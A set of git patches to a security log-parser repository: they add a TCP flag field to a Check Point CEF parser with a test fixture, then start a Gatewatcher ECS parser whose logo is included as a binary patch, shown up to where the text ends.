Subject: [PATCH 004/317] Fix: Checkpoint add flag field

---
 Checkpoint/checkpoint/_meta/fields.yml      |  5 ++
 Checkpoint/checkpoint/ingest/parser.yml     |  4 ++
 Checkpoint/checkpoint/tests/CEF_drop_1.json | 57 +++++++++++++++++++++
 3 files changed, 66 insertions(+)
 create mode 100644 Checkpoint/checkpoint/tests/CEF_drop_1.json

diff --git a/Checkpoint/checkpoint/_meta/fields.yml b/Checkpoint/checkpoint/_meta/fields.yml
index f52df839d..9a297d00a 100644
--- a/Checkpoint/checkpoint/_meta/fields.yml
+++ b/Checkpoint/checkpoint/_meta/fields.yml
@@ -152,3 +152,8 @@ source.size_in_char:
   description: ''
   name: source.size_in_char
   type: number
+
+action.tcp.flag:
+  description: The control flag of the data flow
+  name: action.tcp.flag
+  type: keyword
diff --git a/Checkpoint/checkpoint/ingest/parser.yml b/Checkpoint/checkpoint/ingest/parser.yml
index ef31c1886..6b807ae32 100644
--- a/Checkpoint/checkpoint/ingest/parser.yml
+++ b/Checkpoint/checkpoint/ingest/parser.yml
@@ -169,6 +169,10 @@ stages:
           url.original: "{{checkpoint.message.request}}"
           user_agent.original: "{{checkpoint.message.user_agent}}"
 
+      - set:
+          action.tcp.flag: "{{checkpoint.message.cs4}}"
+        filter: "{{checkpoint.message.cs4Label == 'TCP Flags'}}"
+
       - translate:
         dictionary:
           "0": "hopopt"
diff --git a/Checkpoint/checkpoint/tests/CEF_drop_1.json b/Checkpoint/checkpoint/tests/CEF_drop_1.json
new file mode 100644
index 000000000..0695322fa
--- /dev/null
+++ b/Checkpoint/checkpoint/tests/CEF_drop_1.json
@@ -0,0 +1,57 @@
+{
+  "input": {
+    "message": "CEF:0|Check Point|VPN-1 & FireWall-1|Check Point|Log|Log|Unknown|act=Drop cs4Label=TCP Flags cs4=SYN-ACK deviceDirection=0 rt=1723938549000 spt=443 dpt=2384 ifname=test151.420 logid=1 loguid={0x66c136f5,0xf4,0x1b6410ac,0x151daa25} origin=1.2.3.4 originsicname=CN=cip-fw-test-1,O=CPSRVP.test.test sequencenum=103 version=5 dst=3.4.5.6 product=VPN-1 & FireWall-1 proto=6 src=1.2.3.4 tcp_packet_out_of_state=First packet isn't SYN"
+  },
+  "expected": {
+    "message": "CEF:0|Check Point|VPN-1 & FireWall-1|Check Point|Log|Log|Unknown|act=Drop cs4Label=TCP Flags cs4=SYN-ACK deviceDirection=0 rt=1723938549000 spt=443 dpt=2384 ifname=test151.420 logid=1 loguid={0x66c136f5,0xf4,0x1b6410ac,0x151daa25} origin=1.2.3.4 originsicname=CN=cip-fw-test-1,O=CPSRVP.test.test sequencenum=103 version=5 dst=3.4.5.6 product=VPN-1 & FireWall-1 proto=6 src=1.2.3.4 tcp_packet_out_of_state=First packet isn't SYN",
+    "event": {
+      "code": "Log",
+      "outcome": "success"
+    },
+    "action": {
+      "name": "drop",
+      "outcome": "success",
+      "properties": {
+        "loguid": "{0x66c136f5,0xf4,0x1b6410ac,0x151daa25}",
+        "observer_type": "VPN-1 & FireWall-1",
+        "origin": "1.2.3.4",
+        "originsicname": "CN=cip-fw-test-1,O=CPSRVP.test.test",
+        "product": "VPN-1 & FireWall-1"
+      },
+      "target": "network-traffic",
+      "tcp": {
+        "flag": "SYN-ACK"
+      }
+    },
+    "destination": {
+      "address": "3.4.5.6",
+      "ip": "3.4.5.6",
+      "port": 2384
+    },
+    "network": {
+      "direction": "inbound",
+      "transport": "tcp"
+    },
+    "observer": {
+      "ingress": {
+        "interface": {
+          "name": "test151.420"
+        }
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "3.4.5.6"
+      ]
+    },
+    "rule": {
+      "version": "5"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 443
+    }
+  }
+}
\ No newline at end of file

From d949428d630f7ade4a525f0a3a3073bb8cdfdd62 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Thu, 5 Sep 2024 10:21:57 +0300
Subject: [PATCH 005/317] fix linter

---
 Checkpoint/checkpoint/_meta/fields.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/Checkpoint/checkpoint/_meta/fields.yml b/Checkpoint/checkpoint/_meta/fields.yml
index 9a297d00a..8c5d0787a 100644
--- a/Checkpoint/checkpoint/_meta/fields.yml
+++ b/Checkpoint/checkpoint/_meta/fields.yml
@@ -143,6 +143,11 @@ action.target:
   name: action.target
   type: keyword
 
+action.tcp.flag:
+  description: The control flag of the data flow
+  name: action.tcp.flag
+  type: keyword
+
 destination.size_in_char:
   description: ''
   name: destination.size_in_char
@@ -152,8 +157,3 @@ source.size_in_char:
   description: ''
   name: source.size_in_char
   type: number
-
-action.tcp.flag:
-  description: The control flag of the data flow
-  name: action.tcp.flag
-  type: keyword

From b69dbb64d24e41d8f1b3550017a94345000c70d1 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Mon, 9 Sep 2024 16:11:53 +0300
Subject: [PATCH 006/317] Fix comments

---
 Checkpoint/checkpoint/ingest/parser.yml | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/Checkpoint/checkpoint/ingest/parser.yml b/Checkpoint/checkpoint/ingest/parser.yml
index 6b807ae32..36ba7d7bb 100644
--- a/Checkpoint/checkpoint/ingest/parser.yml
+++ b/Checkpoint/checkpoint/ingest/parser.yml
@@ -168,10 +168,7 @@ stages:
           url.full: "{{checkpoint.message.request}}"
           url.original: "{{checkpoint.message.request}}"
           user_agent.original: "{{checkpoint.message.user_agent}}"
-
-      - set:
-          action.tcp.flag: "{{checkpoint.message.cs4}}"
-        filter: "{{checkpoint.message.cs4Label == 'TCP Flags'}}"
+          action.tcp.flag: "{{checkpoint.message.get('TCP Flags')}}"
 
       - translate:
         dictionary:

From d2ba04e0aaa9b274bf65aa13a183debdd7b51486 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Mon, 9 Sep 2024 16:31:23 +0200
Subject: [PATCH 007/317] First proposal: Gatewatcher ECS parser

---
 GateWatcher/aioniq_ecs/_meta/fields.yml       |   1 +
 GateWatcher/aioniq_ecs/_meta/logo.png         | Bin 0 -> 41007 bytes
 .../aioniq_ecs/_meta/smart-descriptions.json  | 186 +++++
 GateWatcher/aioniq_ecs/ingest/parser.yml      | 768 ++++++++++++++++++
 4 files changed, 955 insertions(+)
 create mode 100644 GateWatcher/aioniq_ecs/_meta/fields.yml
 create mode 100644 GateWatcher/aioniq_ecs/_meta/logo.png
 create mode 100644 GateWatcher/aioniq_ecs/_meta/smart-descriptions.json
 create mode 100644 GateWatcher/aioniq_ecs/ingest/parser.yml

diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
new file mode 100644
index 000000000..c6cac6926
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -0,0 +1 @@
+empty
diff --git a/GateWatcher/aioniq_ecs/_meta/logo.png b/GateWatcher/aioniq_ecs/_meta/logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..21f93317af33899c7ac0ebce3be11e5a0ccea019
GIT binary patch
literal 41007
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
